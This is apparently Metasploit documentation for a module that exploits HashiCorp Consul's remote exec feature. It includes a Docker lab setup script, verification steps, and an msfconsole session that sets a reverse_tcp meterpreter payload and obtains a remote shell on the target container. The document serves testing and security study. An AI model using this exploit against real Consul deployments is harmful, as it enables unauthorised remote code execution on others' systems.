## Vulnerable Application

### Description

This module exploits a feature of Hashicorp Consul named rexec.

The exec command provides a mechanism for remote execution. For example, this can be used to run the uptime command across all machines providing the web service.

The exposure of rexec service depends on the `disable_remote_exec` option. This option was set to true starting from Consul 0.8, to make remote exec opt-in instead of opt-out.


#### References

* Consul Exec - https://www.consul.io/docs/commands/exec.html
* Consul _disable_remote_exec_ option - https://www.consul.io/docs/agent/options.html#disable_remote_exec
* Inspiration from Garfield PoC - https://github.com/torque59/Garfield

### Test setup

The following bash script can be used to setup a testing environment with Docker:

```
#!/bin/sh

echo "[+] Launching consul instances..."
docker run -d --name=consul_bootstrap_server consul agent -server -client=172.17.0.1 -bootstrap -data-dir /tmp/consul
sleep 2

docker run -d --name=consul_server_1 consul agent -server -client=172.17.0.2 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.2

docker run -d --name=consul_server_2 consul agent -server -client=172.17.0.3 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.3

docker run -d -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "disable_remote_exec":false}' consul agent -ui -client=172.17.0.4 -retry-join=172.17.0.1

sleep 4
echo "[+] Checking members..."
docker exec -t consul_bootstrap_server consul members -http-addr="172.17.0.1:8500"
```

You should observe something similar to the excerpt below when running the script:

```
sudo ./launch.sh
[+] Launching consul instances...
23e8aa4687846382e601ec3c5a66d6db9448518647996f8fd8fdbcdde7f612cf
b28c7929c2a2141c162a35d635af48fdafd70f6c03bee61445e7e78f4e76af84
Successfully joined cluster by contacting 1 nodes.
7c53a6f486426ad6ab4886f3f7b85481932333850d0046280ca082ff1bb79358
Successfully joined cluster by contacting 1 nodes.
a58ec109f45029352a94721ee2e7c9c80a9c94178af8efd15279951da8ed0cab
[+] Checking members...
Node          Address          Status  Type    Build  Protocol  DC   Segment
23e8aa468784  172.17.0.1:8301  alive   server  1.0.6  2         dc1  <all>
7c53a6f48642  172.17.0.3:8301  alive   server  1.0.6  2         dc1  <all>
b28c7929c2a2  172.17.0.2:8301  alive   server  1.0.6  2         dc1  <all>
a58ec109f450  172.17.0.4:8301  alive   client  1.0.6  2         dc1  <default>
```

The following bash script can be used to stop and destroy **all your running docker containers** (so be careful if you use docker containers for other things at the same time):

```
#!/bin/sh
for h in `sudo docker ps | grep -v CONTAINER | cut -d' ' -f1`; do sudo docker stop $h && sudo docker rm $h; done
```

## Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Launch a Consul cluster with the provided bash script
  2. Start msfconsole
  3. Do: `use exploit/multi/misc/consul_rexec_exec`
  4. Do: `set RHOST 172.17.0.4`
  5. Do: `set RPORT 8500`
  6. Do: `check`. The target should appear vulnerable.
  7. Do: `set payload` with the payload of your choosing.
  8. Do: `set LHOST 172.17.42.1` (docker0 gateway IP)
  9. Do: `run`
  10. You should get a shell.

## Scenarios

### Reverse shell on Linux host

Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target:

```
msf5 > use exploit/multi/misc/consul_rexec_exec
msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4
RHOSTS => 172.17.0.4
msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1
LHOST => 172.17.42.1
msf5 exploit(multi/misc/consul_rexec_exec) > check
[+] 172.17.0.4:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_rexec_exec) > run

[*] Started reverse TCP handler on 172.17.42.1:4444
[*] Creating session.
[*] Got rexec session ID b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Setting command for rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Triggering execution on rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Sending stage (861480 bytes) to 172.17.0.4
[*] Cleaning up rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Command Stager progress - 115.73% done (883/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.4
OS           :  (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.17.0.4 - Meterpreter session 1 closed.  Reason: User exit
```